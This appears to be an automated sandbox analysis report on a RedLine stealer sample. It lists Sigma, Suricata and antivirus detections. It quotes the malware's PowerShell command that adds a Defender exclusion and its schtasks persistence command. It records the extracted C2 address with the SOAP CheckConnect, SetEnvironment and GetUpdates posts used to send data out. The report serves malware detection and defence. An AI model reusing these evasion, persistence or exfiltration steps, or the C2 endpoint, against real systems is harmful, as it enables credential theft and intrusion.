Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", ProcessId: 7736, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7636, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7400, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp", ProcessId: 7736, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound - Source IP: 185.222.57.67 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:25.200037+0200
SID:	2045001
Source Port:	55615
Destination Port:	49714
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE RedLine Stealer - CheckConnect Response - Source IP: 185.222.57.67 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:22.155298+0200
SID:	2045000
Source Port:	55615
Destination Port:	49714
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 185.222.57.67 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:25.200037+0200
SID:	2046056
Source Port:	55615
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:16.176487+0200
SID:	2022930
Source Port:	443
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO POLICY External IP Address Lookup via api.ip .sb - Source IP: 192.168.2.5 - Destination IP: 104.26.12.31

Timestamp:	2024-07-16T19:57:15.229510+0200
SID:	2835929
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	Device Retrieving External IP Address Detected

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound - Source IP: 185.222.57.67 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:17.363146+0200
SID:	2045001
Source Port:	55615
Destination Port:	49709
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) - Source IP: 104.26.12.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:23.072310+0200
SID:	2833693
Source Port:	443
Destination Port:	49721
Protocol:	TCP
Classtype:	Potential Corporate Privacy Violation

ETPRO HUNTING Request for config.json - Source IP: 192.168.2.5 - Destination IP: 184.28.90.27

Timestamp:	2024-07-16T19:57:03.687918+0200
SID:	2840787
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 104.26.12.31

Timestamp:	2024-07-16T19:57:14.566741+0200
SID:	2835930
Source Port:	49710
Destination Port:	443
Protocol:	TCP
Classtype:	Device Retrieving External IP Address Detected

ET MALWARE RedLine Stealer - CheckConnect Response - Source IP: 185.222.57.67 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:13.184707+0200
SID:	2045000
Source Port:	55615
Destination Port:	49709
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.68.123.157 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:54.382158+0200
SID:	2022930
Source Port:	443
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO POLICY External IP Address Lookup DNS Query (api .ip .sb) - Source IP: 192.168.2.5 - Destination IP: 1.1.1.1

Timestamp:	2024-07-16T19:57:13.586420+0200
SID:	2835928
Source Port:	64713
Destination Port:	53
Protocol:	UDP
Classtype:	Device Retrieving External IP Address Detected

ETPRO MALWARE RedLine - SetEnvironment Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:17.781669+0200
SID:	2849352
Source Port:	49720
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - CheckConnect Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:08.017874+0200
SID:	2849662
Source Port:	49709
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - GetUpdates Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:18.648163+0200
SID:	2848200
Source Port:	49720
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO POLICY Observed External IP Lookup Domain (api.ip .sb in TLS SNI) - Source IP: 192.168.2.5 - Destination IP: 104.26.12.31

Timestamp:	2024-07-16T19:57:23.070316+0200
SID:	2835930
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	Device Retrieving External IP Address Detected

ETPRO MALWARE RedLine - SetEnvironment Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:25.605724+0200
SID:	2849352
Source Port:	49722
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - EnvironmentSettings Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:13.545314+0200
SID:	2849351
Source Port:	49709
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO POLICY Observed SSL Cert (External IP Address Lookup (ip .sb)) - Source IP: 104.26.12.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-16T19:57:14.570164+0200
SID:	2833693
Source Port:	443
Destination Port:	49710
Protocol:	TCP
Classtype:	Potential Corporate Privacy Violation

ETPRO MALWARE RedLine - GetUpdates Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:26.869631+0200
SID:	2848200
Source Port:	49723
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE RedLine - EnvironmentSettings Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:22.511032+0200
SID:	2849351
Source Port:	49714
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO POLICY External IP Address Lookup via api.ip .sb - Source IP: 192.168.2.5 - Destination IP: 104.26.12.31

Timestamp:	2024-07-16T19:57:23.487832+0200
SID:	2835929
Source Port:	49721
Destination Port:	443
Protocol:	TCP
Classtype:	Device Retrieving External IP Address Detected

ETPRO MALWARE RedLine - CheckConnect Request - Source IP: 192.168.2.5 - Destination IP: 185.222.57.67

Timestamp:	2024-07-16T19:57:16.674149+0200
SID:	2849662
Source Port:	49714
Destination Port:	55615
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Avira: detection malicious, Label: HEUR/AGEN.1350997

Found malware configuration

Source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["185.222.57.67:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: owKQ0b029a.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: owKQ0b029a.exe

Joe Sandbox ML: detected

Source: owKQ0b029a.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: owKQ0b029a.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: owKQ0b029a.exe

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7286D FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00C7286D
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C8CBE4 FindFirstFileExA,	0_2_00C8CBE4
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C7F3FB SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00C7F3FB

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Code function: 4x nop then jmp 0A720130h

7_2_0A7202A4

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.222.57.67:55615

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49723

Source: global traffic

TCP traffic: 192.168.2.5:49709 -> 185.222.57.67:55615

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.67:55615Content-Length: 557210Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.67:55615Content-Length: 557202Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.67:55615Content-Length: 556792Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.67:55615Content-Length: 556784Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.67

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.67:5
Source: PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.67:55615
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.67:55615/
Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.67:55615t-eq
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: PO.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PO.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: PO.exe, 0000000F.00000002.2265027022.0000000003138000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: PO.exe, 00000007.00000002.2154355610.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000011.00000002.2239923951.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003082000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000323E000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.000000000306A000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000003040000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: PO.exe, 0000000F.00000002.2265027022.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2352220376.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: PO.exe, 0000000F.00000002.2265027022.0000000003347000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
